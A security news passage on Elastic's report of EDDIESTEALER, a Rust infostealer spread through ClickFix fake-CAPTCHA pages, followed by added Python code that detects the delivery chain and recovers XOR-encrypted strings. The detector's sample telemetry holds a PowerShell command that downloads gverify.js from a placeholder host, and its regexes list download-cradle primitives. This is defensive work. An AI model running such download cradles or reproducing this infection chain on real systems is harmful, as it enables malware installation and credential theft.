ClickFix used to spread novel Rust-based infostealer – Go Health Pro

A new Rust-based infostealer dubbed EDDIESTEALER is being spread via the popular ClickFix social engineering technique, which uses fake CAPTCHAs to fool users, Elastic Security Labs reported Thursday.

EDDIESTEALER evades analysis through the use of various obfuscation techniques, including XOR string encryption, stripping of function symbols, and a custom API lookup mechanism. The infostealer retrieves a task list dynamically from the attacker’s command-and-control (C2) server, allowing it to adapt its behavior over time.

The attack begins with fake Google reCAPTCHA prompts planted on compromised websites. The scam pages instruct the user to copy and paste a PowerShell command into their Windows terminal to prove they are not a robot. This command retrieves and executes a file called gverify.js, which is saved to the victim’s Downloads folder; gverify.js in turn retrieves the final EDDIESTEALER payload, which is also saved to the Downloads folder under a pseudorandom 12-character file name, Elastic explained.

Written in Rust, EDDIESTEALER attempts to avoid static analysis by stripping its function symbols and encrypting most of its strings with an XOR cipher. The researchers noted that the open-source tool rustbinsign can help restore the stripped symbols, while the XOR-encrypted strings can be reverse engineered using tools such as Binary Ninja’s User-Informed Data Flow (UIDF) feature or the open-source Unicorn CPU emulator paired with a scriptable binary analysis tool.

Additional evasion techniques include a basic anti-sandbox check for physical memory greater than 4 GB, a self-deletion mechanism via NTFS Alternate Data Streams (ADS) renaming, and a custom Windows API lookup method that dynamically resolves modules using a LoadLibrary wrapper, further hindering static analysis of its API interactions.

Rather than following a hardcoded task list, EDDIESTEALER retrieves configuration data from the attacker’s C2 server, which tells the malware which programs and applications to target for its information-stealing activities. Elastic has observed the stealer targeting a range of cryptocurrency wallets, browsers, password managers and file transfer protocol (FTP) clients, as well as the Telegram messaging app. The dynamic C2 tasking method allows the attacker to update the list of targeted apps as needed, providing greater flexibility and adaptability.

The EDDIESTEALER campaign highlights the continued popularity of the ClickFix social engineering method, as well as the increasing use of the Rust programming language by malware developers. “A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart, owing to factors such as zero-cost abstractions, Rust’s type system, compiler optimizations, and inherent difficulties in analyzing memory-safe binaries,” the Elastic researchers wrote.
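The delivery chain above (PowerShell cradle, gverify.js executed from the Downloads folder, payload dropped in Downloads under a 12-character pseudorandom name) lends itself to simple endpoint detection logic. The following is an added example, not code from Elastic or from the article: it runs three heuristics over a handful of constructed telemetry events. The event dict shape and field names (`type`, `image`, `cmdline`, `path`) are assumptions rather than any real EDR schema, and the URL in the sample is a placeholder.

```python
"""Detection logic for the ClickFix -> gverify.js -> EDDIESTEALER delivery chain.

Added example, not code from Elastic or from the article. Runs over a few constructed
endpoint telemetry events (process creations and file writes) in a simplified dict shape;
the field names are an assumption, not any real EDR schema.
"""
import re
from pathlib import PureWindowsPath
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives; extend as needed for your environment.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|\biwr\b|\birm\b|\bcurl\b|\bwget\b", re.I
)
# The article names gverify.js saved to the victim's Downloads folder.
GVERIFY_IN_DOWNLOADS = re.compile(r"[\\/]downloads[\\/]gverify\.js\b", re.I)
# The final payload lands in Downloads under a pseudorandom 12-character name.
RANDOM_12 = re.compile(r"^[A-Za-z0-9]{12}$")


def in_downloads(path: str) -> bool:
    """True if any path component is a Downloads folder (case-insensitive)."""
    return "downloads" in (p.lower() for p in PureWindowsPath(path).parts)


def classify(event: dict) -> Optional[str]:
    """Return a detection label for one event, or None if nothing matched."""
    kind = event.get("type")
    if kind == "process":
        image = PureWindowsPath(event.get("image", "")).name.lower()
        cmdline = event.get("cmdline", "")
        if image in POWERSHELL and DOWNLOAD_CRADLE.search(cmdline):
            return "clickfix_powershell_cradle"
        if image in SCRIPT_HOSTS and GVERIFY_IN_DOWNLOADS.search(cmdline):
            return "gverify_js_execution"
    elif kind == "file_write":
        p = PureWindowsPath(event.get("path", ""))
        if in_downloads(str(p)) and p.suffix.lower() in {".exe", ".dll"} and RANDOM_12.match(p.stem):
            return "random12_executable_in_downloads"
    return None


def scan(events) -> list:
    """Map every matching event to (event id, label), preserving event order."""
    hits = []
    for e in events:
        label = classify(e)
        if label:
            hits.append((e["id"], label))
    return hits


# Constructed sample telemetry; the URL is a placeholder, not a real campaign indicator.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"id": 2, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Invoke-WebRequest http://placeholder.invalid/g -OutFile $env:USERPROFILE\Downloads\gverify.js"'},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\gverify.js"'},
    {"id": 4, "type": "file_write", "path": r"C:\Users\alice\Downloads\aB3dE5fG7hJ9.exe"},
    {"id": 5, "type": "file_write", "path": r"C:\Users\alice\Downloads\quarterly-report.pdf"},
    {"id": 6, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for event_id, label in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {label}")
```

The 12-character-name heuristic is noisy on its own; treat it as a correlation signal alongside the cradle and script-host hits from the same user session rather than as a standalone alert. Separately, since the sample refuses to run when it sees 4 GB of physical memory or less, analysis VMs used to detonate it need to be provisioned with more than 4 GB.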
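On the analysis side, the XOR string encryption the article describes is usually the first obstacle. Elastic recovered the strings with Binary Ninja's UIDF feature and Unicorn emulation; the snippet below is an added example, not Elastic's tooling or the malware's own code, showing the lighter-weight known-plaintext workflow an analyst can fall back on once a single blob has been identified. The article does not state EDDIESTEALER's key length or layout, so this assumes a repeating-key XOR over each string blob (a single-byte key is the period-1 case); the 3-byte key and the three "encrypted" strings are constructed here for the demo.

```python
"""Known-plaintext recovery of a repeating-key XOR used to hide strings in a binary.

Added example, not Elastic's tooling or EDDIESTEALER code. Assumes repeating-key XOR
over each string blob; the article does not give the real key length or layout.
"""


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the operation is its own inverse."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def smallest_period(stream: bytes) -> int:
    """Shortest p such that stream repeats every p bytes (len(stream) if it never repeats)."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Derive the repeating key from one blob whose plaintext is known.

    XORing ciphertext with plaintext yields the keystream; its shortest period is the key.
    The known plaintext should be at least as long as the key (ideally twice as long)
    for the period to be unambiguous.
    """
    n = min(len(ciphertext), len(known_plaintext))
    stream = xor_bytes(ciphertext[:n], known_plaintext[:n])
    return stream[: smallest_period(stream)]


def decrypt_string(blob: bytes, key: bytes) -> str:
    """Decrypt one blob and cut at the first NUL, since strings are often NUL-terminated."""
    plaintext = xor_bytes(blob, key).split(b"\x00", 1)[0]
    return plaintext.decode("ascii", errors="replace")


def recover_all(blobs, known_index: int, known_plaintext: bytes):
    """Recover the key from blobs[known_index] and decrypt every blob with it."""
    key = recover_key(blobs[known_index], known_plaintext)
    return key, [decrypt_string(b, key) for b in blobs]


# Constructed sample: a 3-byte key and three "encrypted" strings built here for the demo.
DEMO_KEY = bytes([0x5A, 0x13, 0x77])
ENCRYPTED_BLOBS = [
    xor_bytes(s, DEMO_KEY)
    for s in (b"kernel32.dll\x00", b"LoadLibraryA\x00", b"\\Downloads\\\x00")
]

if __name__ == "__main__":
    # Suppose emulation already revealed that blob 0 decrypts to a DLL name.
    key, strings = recover_all(ENCRYPTED_BLOBS, 0, b"kernel32.dll")
    print("recovered key:", key.hex())
    for s in strings:
        print(repr(s))
```

In practice the blobs come from the .rdata section or from arguments to the decryption routine, and the one known plaintext typically comes from a string whose decrypted value was observed during emulation or dynamic analysis; once the key is known, every remaining blob can be decrypted statically without running the sample.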
